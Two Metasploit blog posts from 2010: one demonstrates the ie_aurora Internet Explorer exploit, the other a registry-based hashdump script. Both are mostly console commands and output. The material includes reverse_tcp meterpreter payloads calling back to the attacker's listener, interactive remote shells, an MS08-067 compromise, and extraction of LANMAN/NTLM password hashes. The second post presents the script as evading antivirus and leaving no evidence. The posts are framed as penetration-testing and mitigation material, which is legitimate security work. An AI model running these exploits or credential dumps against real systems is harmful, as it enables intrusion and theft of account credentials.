Skip navigation
All Places > Metasploit > Blog > 2010 > January
2010

Originally Posted by hdm

 

 

Update: This module, just like the original exploit, only works on IE6 at this time. IE7 requires a slightly different method to reuse the object pointer and IE8 enables DEP by default.

 

Yesterday, a copy of the unpatched Internet Explorer exploit used in the Aurora attacks was uploaded to Wepawet. Since the code is now public, we ported this to a Metasploit module in order to provide a safe way to test your workarounds and mitigation efforts.

 

To get started, grab the latest copy of the Metasploit Framework and use the online update feature to sync latest exploits from the development tree. Start the Metasploit Console (msfconsole) and enter the commands in bold:

 

msf > use exploit/windows/browser/ie_aurora
msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ie_aurora) > set LHOST (your IP)
msf exploit(ie_aurora) > set URIPATH /
msf exploit(ie_aurora) > exploit

 

[*] Exploit running as background job.
[*] Started reverse handler on port 4444
[*]  Local IP: http://192.168.0.151:8080/
[*] Server started.

 

msf exploit(ie_aurora) >

 

Open Internet Explorer on a vulnerable machine (we tested Windows XP SP3 with IE 6) and enter the Local IP URL into the browser. If the exploit succeeds, you should see a new session in the Metasploit Console:

 

[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.151:4444 -> 192.168.0.166:1514)

 

msf exploit(ie_aurora) > sessions -i 1
[*] Starting interaction with 1...

 

meterpreter > getuid
Server username: WINXP\Developer

 

meterpreter > use espia
Loading extension espia...success.

 

meterpreter > screenshot aurora.bmp

 


meterpreter > shell
Process 892 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

 

C:\Documents and Settings\Developer\Desktop>

Originally Posted by hdm

 

 

The Metasploit Meterpreter has supported the "hashdump" command (through the Priv extension) since before version 3.0. The "hashdump" command is an in-memory version of the pwdump tool, but instead of loading a DLL into LSASS.exe, it allocates memory inside the process, injects raw assembly code, executes its via CreateRemoteThread, and then reads the captured hashes back out of memory. This avoids writing files to the drive and by the same token avoids being flagged by antivirus (AV) and intrusion prevention (HIPS) products.

 

Over the last few years, many AV and HIPS products have added hooks to detect this behavior and block it at the API level. Unfortunately, the hooks are often implemented in a way that causes LSASS.exe to crash, which forces the entire system to either halt or reboot. This has made the "hashdump" command (along with pwdump and its friends) somewhat risky to use during a penetration test. One alternative to LSASS injection is to export the raw registry hives and then perform an offline extraction. This works, but it requires the hive files to be stored on the disk and currently requires external tools to use this method with the Metasploit Framework.

 

Over the last couple days, I reimplemented the registry-based method as a Meterpreter script. The key difference is that instead of using the reg.exe command to export the raw hives, this script uses direct registry access to extract the SYSKEY and decrypt the raw LANMAN and NTLM hashes. It isn't the fastest way to do it, but it leaves no evidence on the target, avoids the majority of the HIPS products (unless they filter registry reads), and most importantly is 100% safe in terms of system stability. The output below demonstrates a machine being compromised through MS08-067 and then having the LANMAN/NTLM hashes extracted using the live registry.

 

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.120

 

msf exploit(ms08_067_netapi) > set LHOST 192.168.0.151

 

msf exploit(ms08_067_netapi) > set LPORT 4444

 

msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp

 

msf exploit(ms08_067_netapi) > exploit

 

[*] Started reverse handler on port 4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Triggering the vulnerability...
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.151:4444 -> 192.168.0.120:1041)

 

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

 

meterpreter > run hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 3ed7[...]
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...

 

Administrator:500:aad3b435b51404eeaad3b435b51404ee:...
Guest:501:aad3b435b51404eeaad3b435b51404ee:...
HelpAssistant:1000:ce909bd50f46021bf4aa40680422f646:...
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:...::

 

The caveat -- to run this Meterpreter script, you must already have access to a SYSTEM token. This is already the case if you are exploiting a system service, like the Server Service or most DCERPC vulnerabilities, but can require a few additional steps if you only have administrative access. The reason is that the Administrators group does not have read access to the registry tree that contains the encrypted password hashes. The next blog post will go into the nitty-gritty details of impersonation and privilege escalation on the Windows platform.

 

-HD

Filter Blog

By date: By tag: